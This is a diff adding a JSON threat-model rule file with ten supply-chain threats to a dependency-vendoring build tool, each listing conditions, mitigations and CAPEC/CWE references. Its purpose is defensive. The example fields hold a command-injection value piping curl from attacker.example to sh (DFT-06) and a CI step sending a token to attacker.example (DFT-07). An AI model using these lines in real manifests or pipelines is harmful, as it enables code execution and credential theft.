|
| 1 | +[ |
| 2 | + { |
| 3 | + "SID": "DFT-01", |
| 4 | + "target": ["Dataflow"], |
| 5 | + "description": "Unencrypted transport interception (MITM)", |
| 6 | + "details": "A network-adjacent attacker intercepts an unencrypted (HTTP or plaintext VCS protocol) data flow and substitutes or reads content in transit. Any tool that accepts non-TLS URLs as declared in a manifest or configuration without enforcement is vulnerable.", |
| 7 | + "Likelihood Of Attack": "Medium", |
| 8 | + "severity": "High", |
| 9 | + "condition": "target.controls.isEncrypted is False and len(target.protocol) > 0", |
| 10 | + "prerequisites": "A manifest or configuration declares an http:// or other plaintext-protocol URL. The attacker has a network-adjacent position (same LAN, BGP hijack, or compromised DNS resolver).", |
| 11 | + "mitigations": "Restrict all configured URLs to HTTPS, svn+https://, or SSH. Enforce TLS at the schema-validation layer so plaintext URLs are rejected at parse time. Add integrity hashes for all archive sources so that even a successful MITM is detected.", |
| 12 | + "example": "A CI runner on a shared cloud network fetches a dependency archive over http://. A co-located attacker intercepts the TCP stream and replaces the archive bytes before they reach the build tool.", |
| 13 | + "references": "https://capec.mitre.org/data/definitions/94.html, https://cwe.mitre.org/data/definitions/319.html" |
| 14 | + }, |
| 15 | + { |
| 16 | + "SID": "DFT-02", |
| 17 | + "target": ["Dataflow"], |
| 18 | + "description": "Supply-chain content substitution via server-side compromise", |
| 19 | + "details": "An attacker who compromises an upstream repository host, archive server, or CDN delivers malicious source code because no cryptographic content hash is verified end-to-end. HTTPS transport only protects against network-layer interception; a server-side compromise is undetectable without out-of-band content verification.", |
| 20 | + "Likelihood Of Attack": "Medium", |
| 21 | + "severity": "High", |
| 22 | + "condition": "target.controls.providesIntegrity is False and len(target.protocol) > 0", |
| 23 | + "prerequisites": "No integrity hash is present in the manifest for archive sources, or the dependency is a VCS reference (branch or tag) with no hash equivalent. The attacker controls or has compromised an upstream server, registry, or CDN node.", |
| 24 | + "mitigations": "Require cryptographic integrity hashes for all archive dependencies. Use commit-SHA-pinned VCS dependencies where possible. Verify artifact signatures or SLSA provenance attestations once available.", |
| 25 | + "example": "A project vendor hosts a tarball on a self-managed server. An attacker who previously compromised the server replaces it with a backdoored version; the build tool downloads and vendors it without detecting the substitution.", |
| 26 | + "references": "https://capec.mitre.org/data/definitions/186.html, https://cwe.mitre.org/data/definitions/494.html" |
| 27 | + }, |
| 28 | + { |
| 29 | + "SID": "DFT-03", |
| 30 | + "target": ["Process"], |
| 31 | + "description": "Path traversal in archive or patch extraction", |
| 32 | + "details": "A malicious archive member or patch file uses relative path sequences (../../) or absolute paths to write files outside the intended extraction directory, potentially overwriting project sources, CI configuration, or secrets.", |
| 33 | + "Likelihood Of Attack": "Medium", |
| 34 | + "severity": "Very High", |
| 35 | + "condition": "target.controls.sanitizesInput is False", |
| 36 | + "prerequisites": "The archive or patch file is served from an attacker-controlled or compromised upstream source. The extraction process does not resolve and validate destination paths against an approved root directory.", |
| 37 | + "mitigations": "Resolve every archive member's destination path (following symlinks, e.g. os.path.realpath) and reject any that fall outside the target directory. Validate post-extraction symlinks. Reject patches whose headers reference paths outside the project root.", |
| 38 | + "example": "A tarball contains the member ../../.github/workflows/publish.yml; without path-traversal checks this overwrites the CI publish workflow, injecting a secret-exfiltration step.", |
| 39 | + "references": "https://capec.mitre.org/data/definitions/139.html, https://cwe.mitre.org/data/definitions/22.html, CVE-2001-1267" |
| 40 | + }, |
| 41 | + { |
| 42 | + "SID": "DFT-04", |
| 43 | + "target": ["Datastore"], |
| 44 | + "description": "Sensitive datastore write without content integrity verification", |
| 45 | + "details": "A sensitive datastore that accepts write operations does not validate the content being written. An attacker with write access to an upstream source can inject malicious content that is consumed by downstream processes without detection.", |
| 46 | + "Likelihood Of Attack": "Low", |
| 47 | + "severity": "High", |
| 48 | + "condition": "target.storesSensitiveData is True and target.hasWriteAccess is True and target.controls.validatesInput is False", |
| 49 | + "prerequisites": "The attacker has write access to the upstream source (either through a compromised server or local filesystem access). The consuming process trusts the datastore content without re-validation.", |
| 50 | + "mitigations": "Validate all inputs on read using a strict schema. Use cryptographic integrity hashes for archive sources to detect substitution at the datastore level. Restrict write access to trusted sources only.", |
| 51 | + "example": "Fetched source code is written to a vendor directory from an unverified HTTP source. Because no integrity hash is present, injected malicious source passes undetected into the consumer's build.", |
| 52 | + "references": "https://capec.mitre.org/data/definitions/438.html, https://cwe.mitre.org/data/definitions/345.html" |
| 53 | + }, |
| 54 | + { |
| 55 | + "SID": "DFT-05", |
| 56 | + "target": ["Dataflow"], |
| 57 | + "description": "Mutable VCS reference enables silent content substitution", |
| 58 | + "details": "A branch- or tag-pinned VCS dependency is a mutable reference. An upstream maintainer or attacker with repository write access silently changes the content fetched on the next update without any manifest diff, hash mismatch, or alerting mechanism.", |
| 59 | + "Likelihood Of Attack": "Medium", |
| 60 | + "severity": "Medium", |
| 61 | + "condition": "target.controls.isEncrypted is True and target.controls.providesIntegrity is False and len(target.protocol) > 0", |
| 62 | + "prerequisites": "A manifest pins a dependency to a mutable VCS reference (branch or tag, not a full commit SHA). The upstream repository allows force-pushes to the tracked ref, or an attacker has compromised a maintainer account.", |
| 63 | + "mitigations": "Pin all VCS dependencies to a full commit SHA in the manifest. Periodically audit upstream refs against previously recorded commit SHAs. Enable signed commits or tag verification where the upstream supports it.", |
| 64 | + "example": "A dependency is pinned to a release tag v2.1. A maintainer account is compromised; the attacker force-pushes a backdoored commit to that tag. The next dependency update silently vendors the malicious code.", |
| 65 | + "references": "https://capec.mitre.org/data/definitions/690.html, https://cwe.mitre.org/data/definitions/829.html" |
| 66 | + }, |
| 67 | + { |
| 68 | + "SID": "DFT-06", |
| 69 | + "target": ["Process"], |
| 70 | + "description": "Command injection via unsanitised subprocess input", |
| 71 | + "details": "If external commands are invoked via a shell interpreter or with unsanitised user-controlled strings, an attacker who can influence manifest fields or configuration inputs can inject arbitrary shell commands executed with the privileges of the process.", |
| 72 | + "Likelihood Of Attack": "Low", |
| 73 | + "severity": "High", |
| 74 | + "condition": "target.controls.usesParameterizedInput is False", |
| 75 | + "prerequisites": "A process invokes external commands using shell=True or string interpolation without strict sanitisation of inputs derived from untrusted sources (manifest, CLI arguments, environment variables).", |
| 76 | + "mitigations": "Always invoke external programs with shell=False and list-form arguments. Validate all manifest string fields with a strict allowlist regex before use as subprocess arguments.", |
| 77 | + "example": "A manifest url field contains '; curl attacker.example/exfil | sh'. If the tool passes the URL to a shell command without quoting, the injected command executes in the build environment.", |
| 78 | + "references": "https://capec.mitre.org/data/definitions/88.html, https://cwe.mitre.org/data/definitions/78.html" |
| 79 | + }, |
| 80 | + { |
| 81 | + "SID": "DFT-07", |
| 82 | + "target": ["Process"], |
| 83 | + "description": "CI/CD secret exfiltration via supply-chain attack on build environment", |
| 84 | + "details": "A compromised or malicious step in a CI/CD pipeline (injected via a pull request, a poisoned third-party action or plugin, or a backdoored build dependency) reads secrets from the runner environment and exfiltrates them over an outbound network channel. Without strict egress controls, any code executing in the CI environment can access and transmit secrets.", |
| 85 | + "Likelihood Of Attack": "Low", |
| 86 | + "severity": "High", |
| 87 | + "condition": "target.controls.isHardened is False", |
| 88 | + "prerequisites": "A CI pipeline step can run attacker-controlled code (via a malicious PR that modifies pipeline config, a compromised third-party action or plugin, or a backdoored build dependency). Egress from the CI environment is not restricted to an allowlist of known-good hosts.", |
| 89 | + "mitigations": "Pin all third-party CI actions and plugins to a full commit SHA. Set egress policy to block with an explicit allowlist of required hosts (not just audit). Scope secrets narrowly — avoid passing all secrets to all pipeline jobs. Use isolated environments with mandatory reviewer approval for privileged operations such as publish and deploy.", |
| 90 | + "example": "A PR modifies pipeline configuration to add a step that runs curl -s $CI_TOKEN | attacker.example/collect. Because egress is only audited (not blocked), the exfiltration succeeds and the attacker obtains a publish credential.", |
| 91 | + "references": "https://capec.mitre.org/data/definitions/560.html, https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions" |
| 92 | + }, |
| 93 | + { |
| 94 | + "SID": "DFT-08", |
| 95 | + "target": ["Datastore"], |
| 96 | + "description": "Tampered build artifact suppresses security checks", |
| 97 | + "details": "An attacker with access to the local build environment (or a compromised CI step) tampers with a non-primary artifact — dependency metadata, patch files, pipeline configuration, or security reports — to suppress security checks or inject malicious behaviour into subsequent pipeline runs.", |
| 98 | + "Likelihood Of Attack": "Low", |
| 99 | + "severity": "Medium", |
| 100 | + "condition": "target.controls.validatesInput is False and target.hasWriteAccess is True and target.storesSensitiveData is False", |
| 101 | + "prerequisites": "The attacker has write access to the local repository or the CI runner's working directory. Downstream processes consume the artifact without re-validation or integrity checking.", |
| 102 | + "mitigations": "Integrity-verify build artifacts with checksums or signatures. Treat dependency metadata as an append-only audit log where feasible. Protect pipeline configuration files via branch-protection rules and mandatory code review.", |
| 103 | + "example": "An attacker modifies a dependency metadata cache file to record a known-good hash for a compromised dependency, causing the up-to-date check to report no updates and suppressing the security alert.", |
| 104 | + "references": "https://capec.mitre.org/data/definitions/268.html, https://cwe.mitre.org/data/definitions/494.html" |
| 105 | + }, |
| 106 | + { |
| 107 | + "SID": "DFT-09", |
| 108 | + "target": ["Process"], |
| 109 | + "description": "Archive decompression bomb (resource exhaustion)", |
| 110 | + "details": "A specially crafted archive (zip bomb, tar bomb) expands to an extremely large or deeply nested file tree, causing the extracting process to exhaust disk, memory, or CPU resources. Without size and member-count limits the process hangs or crashes, potentially destabilising the build environment.", |
| 111 | + "Likelihood Of Attack": "Low", |
| 112 | + "severity": "Medium", |
| 113 | + "condition": "target.controls.checksInputBounds is False", |
| 114 | + "prerequisites": "The archive is fetched from an attacker-controlled or compromised source. The extracting process applies no upper bound on uncompressed size or member count before or during extraction.", |
| 115 | + "mitigations": "Reject archives whose uncompressed size exceeds a configurable limit (e.g. 500 MB) or whose member count exceeds a configurable ceiling (e.g. 10 000). Apply these limits early in the streaming extraction loop, before writing any bytes to disk.", |
| 116 | + "example": "A 42 KB zip bomb (42.zip) expands to 4.5 PB of nested zero-byte files; without a member-count limit the extraction loop runs indefinitely, exhausting disk space on the CI runner.", |
| 117 | + "references": "https://capec.mitre.org/data/definitions/130.html, https://cwe.mitre.org/data/definitions/400.html" |
| 118 | + }, |
| 119 | + { |
| 120 | + "SID": "DFT-10", |
| 121 | + "target": ["Datastore"], |
| 122 | + "description": "Build or development dependency substitution via compromised registry", |
| 123 | + "details": "A project's own build and development dependencies are fetched from a public registry without cryptographic hash verification. A compromised registry mirror, BGP-hijacked endpoint, or DNS-spoofed response can substitute a malicious package that runs arbitrary code during installation or build, with access to CI/CD secrets.", |
| 124 | + "Likelihood Of Attack": "Low", |
| 125 | + "severity": "High", |
| 126 | + "condition": "target.controls.providesIntegrity is False and target.hasWriteAccess is False", |
| 127 | + "prerequisites": "A package registry (e.g. PyPI, npm, RubyGems) or its DNS resolution is compromised. The CI install step does not use hash-pinned dependency files (e.g. --require-hashes, lockfiles with integrity fields).", |
| 128 | + "mitigations": "Pin all build and development dependencies with cryptographic hashes in a lockfile or requirements file (e.g. pip --require-hashes, package-lock.json integrity fields). Use a private registry mirror with content verification. Prefer install from lockfile over loose version ranges in CI.", |
| 129 | + "example": "A BGP hijack redirects package registry traffic to a malicious mirror that serves a backdoored build tool. The backdoor runs at install time, exfiltrating the CI publish token before the build begins.", |
| 130 | + "references": "https://capec.mitre.org/data/definitions/538.html, https://cwe.mitre.org/data/definitions/494.html" |
| 131 | + } |
| 132 | +] |
0 commit comments